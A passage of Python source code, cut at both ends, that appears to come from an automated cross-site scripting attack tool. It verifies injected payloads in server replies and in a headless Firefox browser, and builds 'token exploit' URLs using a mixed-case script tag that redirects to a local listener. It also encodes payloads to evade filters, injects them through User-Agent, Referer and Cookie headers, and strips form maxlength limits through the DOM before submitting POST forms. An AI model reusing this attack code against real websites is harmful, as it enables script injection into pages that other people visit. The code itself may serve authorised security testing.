  1302. if str(key) in dest_url:
  1303. if key in curl_handle.body():
  1304. self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
  1305. else:
  1306. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1307. else:
  1308. for key, value in self.final_hashes.items():
  1309. if key in current_hashes:
  1310. if "XSA" in value:
  1311. method = "XSA"
  1312. hashing = key
  1313. elif "XSR" in value:
  1314. method = "XSR"
  1315. hashing = key
  1316. elif "COO" in value:
  1317. method = "COO"
  1318. hashing = key
  1319. else:
  1320. method = value
  1321. hashing = key
  1322. if not hashing:
  1323. pass
  1324. else:
  1325. if hashing not in dest_url:
  1326. if key in current_hashes:
  1327. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1328. b64_string = payload["payload"].split("[B64]")
  1329. b64_string = b64_string[1]
  1330. b64_string = b64_string.replace('PAYLOAD', key)
  1331. b64_string = b64encode(b64_string)
  1332. b64_string = urllib.parse.urlencode({'':b64_string})
  1333. if b64_string.startswith("="):
  1334. b64_string = b64_string.replace("=", "")
  1335. if str(b64_string) in str(dest_url):
  1336. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1337. else:
  1338. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1339. else:
  1340. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1341. self.report("")
  1342. def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
  1343. options = self.options
  1344. c_info = str(curl_handle.info())
  1345. c_body = str(curl_handle.body())
  1346. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1347. b64_string = payload["payload"].split("[B64]")
  1348. b64_string = b64_string[1]
  1349. b64_string = b64_string.replace('PAYLOAD', hashing)
  1350. b64_string = b64encode(b64_string)
  1351. if b64_string.startswith("="):
  1352. b64_string = b64_string.replace("=", "")
  1353. hashing = b64_string
  1354. if payload['browser'] == "[Document Object Model Injection]":
  1355. self.check_hash_using_dom(dest_url, payload, hashing, query_string, orig_url, method) # check hash using internal headless browser engine
  1356. else:
  1357. if str(hashing) in c_body and "http-code: 200" in c_info: # [XSS CHECKPOINT: anti-false positives]
  1358. self.check_false_positives(hashing, c_body, dest_url, payload, query_string, orig_url, method)
  1359. else:
  1360. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1361. def check_hash_using_dom(self, dest_url, payload, hashing, query_string, orig_url, method):
  1362. if self.cookie_set_flag == False:
  1363. self.generate_headless_cookies(orig_url)
  1364. self.cookie_set_flag = True # cookie has been set!
  1365. try:
  1366. self.driver.get(dest_url) # GET
  1367. src = self.driver.page_source
  1368. except self.dom_browser_alert as alert_text: # handled with UnexpectedAlertPresentException
  1369. if (hashing in str(alert_text)): # [XSS DOM CHECKPOINT: alert() dialog open!]
  1370. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
  1371. self.token_arrived_hashes.append(hashing) # add token/hashing for counting
  1372. else:
  1373. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1374. else:
  1375. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1376. def check_false_positives(self, hashing, c_body, dest_url, payload, query_string, orig_url, method): # some anti false positives checkers
  1377. if str(self.options.discode) in c_body: # provided by user
  1378. self.report("[Info] Reply contains code [ --discode ] provided to be discarded -> [DISCARDING!]\n")
  1379. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1380. else:
  1381. if str('&gt;' + hashing) in c_body or str('href=' + dest_url + hashing) in c_body or str('content=' + dest_url + hashing) in c_body:
  1382. self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
  1383. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1384. elif str(hashing+",") in c_body or str(hashing+'","') in c_body:
  1385. self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
  1386. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1387. else:
  1388. if self.options.discode:
  1389. self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded -> [ADDING!] ;-)\n")
  1390. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
  1391. def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1392. """
  1393. Add an attack that failed to inject
  1394. """
  1395. if method == "heuristic":
  1396. self.report(" [NOT FOUND] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1397. self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1398. elif method == "hashing check":
  1399. self.report(" [NOT FOUND] -> [ " + str(hashing) + " ] : [ hashing_check ]")
  1400. self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1401. else:
  1402. self.report(" [NOT FOUND] -> [ " + hashing + " ] : [ " + method + " ]")
  1403. self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1404. def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1405. """
  1406. Add an attack that have managed to inject code
  1407. """
  1408. if method == "heuristic":
  1409. self.report(" [FOUND !!!] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1410. self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1411. elif method == "hashing check":
  1412. self.report(" [FOUND !!!] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1413. self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1414. else:
  1415. payload_sub = payload['payload']
  1416. self.report(" [FOUND !!!] -> [ " + hashing + " ] : [ " + method + " ]")
  1417. self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1418. for reporter in self._reporters:
  1419. reporter.add_success(dest_url)
  1420. if self.options.reversecheck:
  1421. if self.options.dcp or self.options.inducedcode or self.options.dom:
  1422. pass
  1423. else:
  1424. self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
  1425. def create_headless_embed_browser(self):
  1426. agents = [] # user-agents
  1427. self.cookie_set_flag = False # used for cookie
  1428. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  1429. for line in f:
  1430. agents.append(line)
  1431. try:
  1432. agent = random.choice(agents).strip() # set random user-agent
  1433. except:
  1434. agent = "Privoxy/1.0" # set static user-agent
  1435. try: # selenium + firefox + gecko(bin)
  1436. from selenium import webdriver
  1437. from selenium.webdriver.firefox.options import Options as FirefoxOptions
  1438. from selenium.common.exceptions import UnexpectedAlertPresentException as UnexpectedAlertPresentException # used for search alert dialogs at DOM
  1439. self.dom_browser_alert = UnexpectedAlertPresentException
  1440. profile = webdriver.FirefoxProfile()
  1441. profile.set_preference("general.useragent.override", str(agent)) # set Firefox (profile) - random user-agent
  1442. profile.set_preference('browser.safebrowsing.enabled', True)
  1443. profile.set_preference('toolkit.telemetry.enabled', False)
  1444. profile.set_preference('webdriver_accept_untrusted_certs', True)
  1445. profile.set_preference('security.insecure_field_warning.contextual.enabled', False)
  1446. profile.set_preference('security.insecure_password.ui.enabled', False)
  1447. profile.set_preference('extensions.logging.enabled', False)
  1448. options = FirefoxOptions()
  1449. options.add_argument("-headless") # set Firefox (options) - headless mode
  1450. options.add_argument("-no-remote")
  1451. options.add_argument("-no-first-run")
  1452. options.add_argument("-app")
  1453. options.add_argument("-safe-mode")
  1454. current_dir = os.getcwd()
  1455. driver = webdriver.Firefox(options=options, firefox_profile=profile, executable_path=current_dir+"/core/driver/geckodriver", log_path=os.devnull) # wrapping!
  1456. except:
  1457. driver = None
  1458. self.token_arrived_flag = False
  1459. if DEBUG == True:
  1460. traceback.print_exc()
  1461. return driver
  1462. def generate_GET_token_payload(self, orig_url, dest_url, query_string, hashing, payload, vector_found):
  1463. if "VECTOR" in orig_url:
  1464. dest_url = orig_url
  1465. else:
  1466. if not dest_url.endswith("/"):
  1467. dest_url = dest_url + "/"
  1468. dest_url = orig_url + query_string
  1469. dest_url = dest_url.split("#")[0]
  1470. p_uri = urlparse(dest_url)
  1471. uri = p_uri.netloc
  1472. path = p_uri.path
  1473. target_params = parse_qs(urlparse(dest_url).query, keep_blank_values=False)
  1474. for key, value in target_params.items():
  1475. if key == vector_found: # only replace parameters with valid hashes
  1476. target_params[key] = payload['payload']
  1477. else:
  1478. target_params[key] = target_params[key][0]
  1479. target_url_params = urllib.parse.urlencode(target_params)
  1480. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  1481. dest_url = urllib.parse.unquote(dest_url)
  1482. tok_url = self.generate_token_exploit(hashing, dest_url, payload)
  1483. return tok_url
  1484. def generate_POST_token_payload(self, orig_url, dest_url, query_string, hashing, payload, vector_found):
  1485. if vector_found in dest_url:
  1486. v = dest_url.split(vector_found+"=")[1]
  1487. p = v.split("&")[0]
  1488. dest_url = dest_url.replace(p, payload['payload'])
  1489. dest_url = urllib.parse.unquote(dest_url)
  1490. tok_url = self.generate_token_exploit(hashing, dest_url, payload)
  1491. return tok_url
  1492. def generate_token_exploit(self, hashing, dest_url, payload):
  1493. self_url = "http://localhost:19084/success/" + hashing
  1494. shadow_js_inj = "document.location=document.location.hash.substring(1)"
  1495. shadow_inj = "<SCrIpT>" + shadow_js_inj + "</ScRiPt>"
  1496. _e = self.encoding_permutations
  1497. if self.options.script: # manual injections
  1498. if 'XSS' in dest_url:
  1499. dest_url = dest_url.replace('XSS', hashing)
  1500. elif 'XS1' in dest_url:
  1501. dest_url = dest_url.replace('XS1', hashing)
  1502. if "'>" in dest_url:
  1503. dest_url = dest_url.split("'>")[0]
  1504. tok_url = dest_url + _e("'>" + shadow_inj)
  1505. tok_url += '#' + self_url
  1506. elif '">' in dest_url:
  1507. dest_url = dest_url.split('">')[0]
  1508. tok_url = dest_url + _e('">' + shadow_inj)
  1509. tok_url += '#' + self_url
  1510. elif 'onerror=' in dest_url:
  1511. dest_url = dest_url.split('onerror=')[0]
  1512. tok_url = dest_url + _e('onerror=' + shadow_js_inj + ">")
  1513. tok_url+= '#' + self_url
  1514. elif 'onError=' in dest_url:
  1515. dest_url = dest_url.split('onError=')[0]
  1516. tok_url = dest_url + _e('onError=' + shadow_js_inj + ">")
  1517. tok_url+= '#' + self_url
  1518. elif 'onload=' in dest_url:
  1519. dest_url = dest_url.split('onload=')[0]
  1520. tok_url = dest_url + _e('onload=' + shadow_js_inj + ">")
  1521. tok_url+= '#' + self_url
  1522. elif 'onLoad=' in dest_url:
  1523. dest_url = dest_url.split('onLoad=')[0]
  1524. tok_url = dest_url + _e('onLoad=' + shadow_js_inj + ">")
  1525. tok_url+= '#' + self_url
  1526. else:
  1527. tok_url = dest_url + "#" + self_url
  1528. else: # default + auto injections
  1529. if 'VECTOR' in dest_url:
  1530. dest_url = dest_url.replace('VECTOR', payload['payload'])
  1531. if '">PAYLOAD' in dest_url:
  1532. tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
  1533. tok_url += '#' + self_url
  1534. elif "'>PAYLOAD" in dest_url:
  1535. tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
  1536. tok_url += '#' + self_url
  1537. elif "javascript:PAYLOAD" in dest_url:
  1538. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
  1539. tok_url = dest_url.replace("javascript:PAYLOAD", _e("javascript:" + shadow_js_inj))
  1540. tok_url+= '#' + self_url
  1541. elif '"PAYLOAD"' in dest_url:
  1542. tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
  1543. elif "'PAYLOAD'" in dest_url:
  1544. tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
  1545. elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
  1546. tok_url = dest_url.replace('PAYLOAD', self_url)
  1547. elif "SCRIPT" in dest_url:
  1548. tok_url = dest_url.replace('PAYLOAD', shadow_js_inj)
  1549. tok_url += '#' + self_url
  1550. elif 'onerror="PAYLOAD"' in dest_url:
  1551. tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
  1552. tok_url+= '#' + self_url
  1553. elif 'onerror="javascript:PAYLOAD"' in dest_url:
  1554. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
  1555. tok_url = dest_url.replace('onerror="javascript:PAYLOAD"', _e('onerror="javascript:' + shadow_js_inj + '"'))
  1556. tok_url+= '#' + self_url
  1557. elif 'onError="PAYLOAD"' in dest_url:
  1558. tok_url = dest_url.replace('onError="PAYLOAD"', _e('onError="' + shadow_inj + '"'))
  1559. tok_url+= '#' + self_url
  1560. elif 'onError="javascript:PAYLOAD"' in dest_url:
  1561. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
  1562. tok_url = dest_url.replace('onError="javascript:PAYLOAD"', _e('onError="javascript:' + shadow_js_inj + '"'))
  1563. tok_url+= '#' + self_url
  1564. elif 'onload="PAYLOAD"' in dest_url:
  1565. tok_url = dest_url.replace('onload="PAYLOAD"', _e('onload="' + shadow_inj + '"'))
  1566. tok_url+= '#' + self_url
  1567. elif 'onload="javascript:PAYLOAD"' in dest_url:
  1568. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
  1569. tok_url = dest_url.replace('onload="javascript:PAYLOAD"', _e('onload="javascript:' + shadow_js_inj + '"'))
  1570. tok_url+= '#' + self_url
  1571. elif 'onLoad="PAYLOAD"' in dest_url:
  1572. tok_url = dest_url.replace('onLoad="PAYLOAD"', _e('onLoad="' + shadow_inj + '"'))
  1573. tok_url+= '#' + self_url
  1574. elif 'onLoad="javascript:PAYLOAD"' in dest_url:
  1575. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
  1576. tok_url = dest_url.replace('onLoad="javascript:PAYLOAD"', _e('onLoad="javascript:' + shadow_js_inj + '"'))
  1577. tok_url+= '#' + self_url
  1578. elif '<PAYLOAD>' in dest_url:
  1579. tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
  1580. tok_url+= '#' + self_url
  1581. elif 'PAYLOAD' in dest_url:
  1582. tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
  1583. tok_url+= '#' + self_url
  1584. elif 'href' in dest_url and 'PAYLOAD' in dest_url:
  1585. tok_url = dest_url.replace('PAYLOAD', self_url)
  1586. elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
  1587. tok_url = dest_url.replace('PAYLOAD', self_url)
  1588. elif 'url' in dest_url and 'PAYLOAD' in dest_url:
  1589. tok_url = dest_url.replace('PAYLOAD', self_url)
  1590. else:
  1591. tok_url = dest_url + "#" + self_url
  1592. return tok_url
  1593. def do_token_check(self, orig_url, hashing, payload, query_string, dest_url): # searching for a [100% VULNERABLE] XSS exploit!
  1594. tok_url = None
  1595. tok_total = []
  1596. if self.hash_found:
  1597. for l in self.hash_found:
  1598. vector_found = l[2]
  1599. hash_found = l[3]
  1600. if hashing in hash_found:
  1601. if not self.options.postdata: # GET
  1602. tok_url = self.generate_GET_token_payload(orig_url, dest_url, query_string, hashing, payload, vector_found)
  1603. else: # POST
  1604. tok_url = self.generate_POST_token_payload(orig_url, dest_url, query_string, hashing, payload, vector_found)
  1605. if tok_url:
  1606. self.send_token_exploit(orig_url, tok_url, hashing, vector_found)
  1607. def generate_headless_cookies(self, orig_url): # generate cookies for internal headless browser engine
  1608. self.driver.get(orig_url)
  1609. r_cookies = self.driver.get_cookies() # get cookies
  1610. if self.options.cookie:
  1611. cookie = SimpleCookie()
  1612. cookie.load(self.options.cookie)
  1613. for key, morsel in cookie.items():
  1614. for c in r_cookies:
  1615. if key == c["name"]:
  1616. c["value"] = str(morsel.value)
  1617. for c in r_cookies:
  1618. self.driver.add_cookie(c) # add cookies to driver
  1619. def send_token_exploit(self, orig_url, tok_url, hashing, vector_found):
  1620. try:
  1621. if self.cookie_set_flag == False:
  1622. if not self.options.postdata: # GET
  1623. self.generate_headless_cookies(tok_url) # send 'tok_url'
  1624. else: # POST
  1625. self.generate_headless_cookies(orig_url) # send 'orig_url'
  1626. self.cookie_set_flag = True # cookie has been set!
  1627. if self.options.postdata: # GET + web forms scrapping + POST
  1628. self.driver.get(orig_url) # GET request to store forms
  1629. tok_parsed = parse_qs(tok_url)
  1630. param_found = []
  1631. for param_parsed in tok_parsed: # find params
  1632. param = self.driver.find_element_by_name(param_parsed) # by name
  1633. if not param:
  1634. param = self.driver.find_element_by_id(param_parsed) # by id
  1635. if param:
  1636. value = str(tok_parsed[param_parsed])
  1637. if "#http://localhost:19084/success/"+str(hashing) in value: # re-parsing injected params for POST
  1638. value = value.replace("#http://localhost:19084/success/"+str(hashing), "")
  1639. if "<script>document.location=document.location.hash.substring(1)</script>" in value:
  1640. value = value.replace("<script>document.location=document.location.hash.substring(1)", "<script src='http://localhost:19084/success/"+str(hashing)+"'>")
  1641. if "['" in value:
  1642. value = value.replace("['", "")
  1643. if "']" in value:
  1644. value = value.replace("']", "")
  1645. param.send_keys(str(value))
  1646. param_found.append(param)
  1647. max_length = param.get_attribute("maxlength")
  1648. if max_length: # bypass max length filters by changing DOM | black magic!
  1649. self.driver.execute_script("arguments[0].setAttribute('maxlength', arguments[1])", param, '9999999')
  1650. if len(param_found) == len(tok_parsed): # form fully filled!
  1651. login = self.driver.find_element_by_xpath("//*[@type='submit']") # find submit by type
  1652. login.click() # click it!
  1653. else: # GET
  1654. self.driver.get(tok_url)
  1655. if tok_url not in self.final_attacks:
  1656. self.final_attacks[hashing] = {'url': tok_url}
  1657. self.token_arrived_flag = True
  1658. else:
  1659. self.token_arrived_flag = False
  1660. except:
  1661. self.token_arrived_flag = False
  1662. if DEBUG == True:
  1663. traceback.print_exc()
  1664. def _report_attack_failure(self, curl_handle, dest_url, payload,\
  1665. query_string, orig_url):
  1666. """
  1667. report connection failure of an attack
  1668. """
  1669. options = self.options
  1670. current_hashes = [] # to check for ongoing hashes
  1671. if payload['browser'] == "[Heuristic test]":
  1672. for key, value in self.hashed_injections.items():
  1673. if key not in current_hashes:
  1674. self.final_hashes[key] = value
  1675. current_hashes.append(key)
  1676. elif self.options.hash:
  1677. for key, value in self.hashed_injections.items():
  1678. self.final_hashes[key] = value
  1679. current_hashes.append(key)
  1680. else:
  1681. self.report("-"*45)
  1682. self.report("\n[!] Hashing: \n")
  1683. for key, value in self.hashed_injections.items():
  1684. if str(key) in str(dest_url): # GET
  1685. if key not in current_hashes:
  1686. self.report(" [ " +key+" ] : [" , value + " ]")
  1687. self.final_hashes[key] = value
  1688. current_hashes.append(key)
  1689. else:
  1690. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1691. b64_string = payload["payload"].split("[B64]")
  1692. b64_string = b64_string[1]
  1693. b64_string = b64_string.replace('PAYLOAD', key)
  1694. b64_string = b64encode(b64_string)
  1695. b64_string = urllib.parse.urlencode({'':b64_string})
  1696. if b64_string.startswith("="):
  1697. b64_string = b64_string.replace("=", "")
  1698. if str(b64_string) in str(dest_url):
  1699. if key not in current_hashes:
  1700. self.report(" [ " +key+" ] : [" , value + " ]")
  1701. self.final_hashes[key] = value
  1702. current_hashes.append(key)
  1703. else: # when using encoders (Str, Hex, Dec...)
  1704. payload_string = payload["payload"].replace("PAYLOAD", key)
  1705. hashed_payload = self.encoding_permutations(payload_string)
  1706. if self.options.Cem:
  1707. enc_perm = options.Cem.split(",")
  1708. for e in enc_perm:
  1709. hashed_payload = self.encoding_permutations(payload_string)
  1710. if e == "Str":
  1711. hashed_payload = hashed_payload.replace(",", "%2C")
  1712. if e == "Mix":
  1713. hashed_payload=urllib.parse.quote(hashed_payload)
  1714. if e == "Dec":
  1715. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1716. if e == "Hex":
  1717. hashed_payload = hashed_payload.replace("%", "%25")
  1718. if e == "Hes":
  1719. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1720. hashed_payload = hashed_payload.replace(";", "%3B")
  1721. else:
  1722. if self.options.Str:
  1723. hashed_payload = hashed_payload.replace(",", "%2C")
  1724. if self.options.Mix:
  1725. hashed_payload=urllib.parse.quote(hashed_payload)
  1726. if self.options.Dec:
  1727. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1728. if self.options.Hex:
  1729. hashed_payload = hashed_payload.replace("%", "%25")
  1730. if self.options.Hes:
  1731. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1732. hashed_payload = hashed_payload.replace(";", "%3B")
  1733. if str(hashed_payload) in str(dest_url):
  1734. if key not in current_hashes:
  1735. self.report(" [ " +key+" ] : [" , value + " ]")
  1736. self.final_hashes[key] = value
  1737. current_hashes.append(key)
  1738. if self.extra_hashed_injections:
  1739. for k, v in self.extra_hashed_injections.items():
  1740. payload_url = str(v[1])
  1741. if payload_url == payload["payload"]:
  1742. if k not in current_hashes:
  1743. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1744. self.final_hashes[k] = v[0]
  1745. current_hashes.append(k)
  1746. self.report("\n"+"-"*45+"\n")
  1747. if payload['browser'] == "[Heuristic test]":
  1748. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1749. else:
  1750. if self.extra_hashed_injections:
  1751. extra_attacks=[]
  1752. if options.xsa:
  1753. extra_attacks.append("XSA")
  1754. if options.xsr:
  1755. extra_attacks.append("XSR")
  1756. if options.coo:
  1757. extra_attacks.append("COO")
  1758. if extra_attacks:
  1759. extra_attacks = "+ "+ str(extra_attacks)
  1760. if options.postdata:
  1761. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1762. else:
  1763. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1764. else:
  1765. if options.postdata:
  1766. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1767. else:
  1768. self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
  1769. if not self.options.hash and not self.options.script:
  1770. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1771. pass
  1772. else:
  1773. self.report("-"*45)
  1774. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1775. pass
  1776. else:
  1777. if not "XSS" in dest_url or not "X1S" in dest_url:
  1778. if self.options.xsa or self.options.xsr or self.options.coo:
  1779. pass
  1780. else:
  1781. self.report("-"*45)
  1782. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1783. if not self.options.verbose:
  1784. self.report("-"*45 + "\n")
  1785. else:
  1786. self.report("-"*45)
  1787. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1788. if not self.options.verbose:
  1789. self.report("-"*45 + "\n")
  1790. # statistics injections counters
  1791. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1792. self.check_positives = self.check_positives + 1
  1793. elif payload['browser']=="[Data Control Protocol Injection]":
  1794. self.dcp_injection = self.dcp_injection + 1
  1795. elif payload['browser']=="[Document Object Model Injection]":
  1796. self.dom_injection = self.dom_injection + 1
  1797. elif payload['browser']=="[Induced Injection]":
  1798. self.httpsr_injection = self.httpsr_injection + 1
  1799. elif payload['browser']=="[manual_injection]":
  1800. self.manual_injection = self.manual_injection + 1
  1801. else:
  1802. self.auto_injection = self.auto_injection +1
  1803. if not self.hashed_injections:
  1804. for k, v in self.extra_hashed_injections.items():
  1805. if k in current_hashes:
  1806. if v[0] == "XSA":
  1807. agent = v[1]
  1808. agent = agent.replace("PAYLOAD", k)
  1809. Curl.agent = agent
  1810. if v[0] == "XSR":
  1811. referer = v[1]
  1812. referer = referer.replace("PAYLOAD", k)
  1813. Curl.referer = referer
  1814. if v[0] == "COO":
  1815. cookie = v[1]
  1816. cookie = cookie.replace("PAYLOAD", k)
  1817. Curl.cookie = cookie
  1818. else:
  1819. for key, value in self.hashed_injections.items():
  1820. for k, v in self.extra_hashed_injections.items():
  1821. payload_url = v[1]
  1822. payload_url = payload_url.replace("PAYLOAD",key)
  1823. payload_url = payload_url.replace(" ", "+") # black magic!
  1824. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
  1825. if payload_url in final_dest_url:
  1826. if v[0] == "XSA":
  1827. agent = v[1]
  1828. agent = agent.replace("PAYLOAD", k)
  1829. Curl.agent = agent
  1830. if v[0] == "XSR":
  1831. referer = v[1]
  1832. referer = referer.replace("PAYLOAD", k)
  1833. Curl.referer = referer
  1834. if v[0] == "COO":
  1835. cookie = v[1]
  1836. cookie = cookie.replace("PAYLOAD", k)
  1837. Curl.cookie = cookie
  1838. else:
  1839. if k in current_hashes:
  1840. if v[0] == "XSA":
  1841. agent = v[1]
  1842. agent = agent.replace("PAYLOAD", k)
  1843. Curl.agent = agent
  1844. if v[0] == "XSR":
  1845. referer = v[1]
  1846. referer = referer.replace("PAYLOAD", k)
  1847. Curl.referer = referer
  1848. if v[0] == "COO":
  1849. cookie = v[1]
  1850. cookie = cookie.replace("PAYLOAD", k)
  1851. Curl.cookie = cookie
  1852. if options.verbose:
  1853. self.report("-"*45)
  1854. self.report("\n[+] HTTP Headers Verbose:\n")
  1855. self.report(" [Client Request]")
  1856. Curl.print_options()
  1857. self.report(" [Server Reply]\n")
  1858. self.report(curl_handle.info())
  1859. self.report("="*45)
  1860. self.report("[*] Injection(s) Results:")
  1861. self.report("="*45 + "\n")
  1862. if payload['browser']=="[Heuristic test]":
  1863. for key, value in self.final_hashes.items():
  1864. if str(key) in dest_url:
  1865. heuristic_string = key
  1866. heuristic_param = str(payload['payload']).strip('XSS')
  1867. if heuristic_param == "\\":
  1868. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1869. elif heuristic_param == "/":
  1870. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1871. elif heuristic_param == ">":
  1872. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1873. elif heuristic_param == "<":
  1874. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1875. elif heuristic_param == ";":
  1876. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1877. elif heuristic_param == "'":
  1878. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1879. elif heuristic_param == '"':
  1880. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1881. elif heuristic_param == "=":
  1882. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1883. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1884. elif self.options.hash:
  1885. for key, value in self.final_hashes.items():
  1886. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1887. self.report("\n" +"="*45)
  1888. else:
  1889. for key, value in self.final_hashes.items():
  1890. if "XSA" in value:
  1891. method = "xsa"
  1892. hashing = key
  1893. elif "XSR" in value:
  1894. method = "xsr"
  1895. hashing = key
  1896. elif "COO" in value:
  1897. method = "coo"
  1898. hashing = key
  1899. else:
  1900. method = "url"
  1901. hashing = key
  1902. if self.options.Str:
  1903. payload_string = payload["payload"].replace("PAYLOAD", key)
  1904. hashed_payload = self.encoding_permutations(payload_string)
  1905. hashed_payload = hashed_payload.replace(",", "%2C")
  1906. if str(hashed_payload) in str(dest_url):
  1907. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1908. elif self.options.Mix:
  1909. payload_string = payload["payload"].replace("PAYLOAD", key)
  1910. hashed_payload = self.encoding_permutations(payload_string)
  1911. hashed_payload=urllib.parse.quote(hashed_payload)
  1912. if str(hashed_payload) in str(dest_url):
  1913. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1914. elif self.options.Dec:
  1915. payload_string = payload["payload"].replace("PAYLOAD", key)
  1916. hashed_payload = self.encoding_permutations(payload_string)
  1917. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1918. if str(hashed_payload) in str(dest_url):
  1919. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1920. elif self.options.Hex:
  1921. payload_string = payload["payload"].replace("PAYLOAD", key)
  1922. hashed_payload = self.encoding_permutations(payload_string)
  1923. hashed_payload = hashed_payload.replace("%", "%25")
  1924. if str(hashed_payload) in str(dest_url):
  1925. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1926. elif self.options.Hes:
  1927. payload_string = payload["payload"].replace("PAYLOAD", key)
  1928. hashed_payload = self.encoding_permutations(payload_string)
  1929. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1930. hashed_payload = hashed_payload.replace(";", "%3B")
  1931. if str(hashed_payload) in str(dest_url):
  1932. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1933. else:
  1934. if self.options.Cem:
  1935. enc_perm = options.Cem.split(",")
  1936. payload_string = payload["payload"].replace("PAYLOAD", key)
  1937. for e in enc_perm:
  1938. hashed_payload = self.encoding_permutations(payload_string)
  1939. if str(e) == "Str":
  1940. hashed_payload = hashed_payload.replace(",", "%2C")
  1941. if e == "Mix":
  1942. hashed_payload=urllib.parse.quote(hashed_payload)
  1943. if e == "Dec":
  1944. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1945. if e == "Hex":
  1946. hashed_payload = hashed_payload.replace("%", "%25")
  1947. if e == "Hes":
  1948. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1949. hashed_payload = hashed_payload.replace(";", "%3B")
  1950. if str(hashed_payload) in str(dest_url):
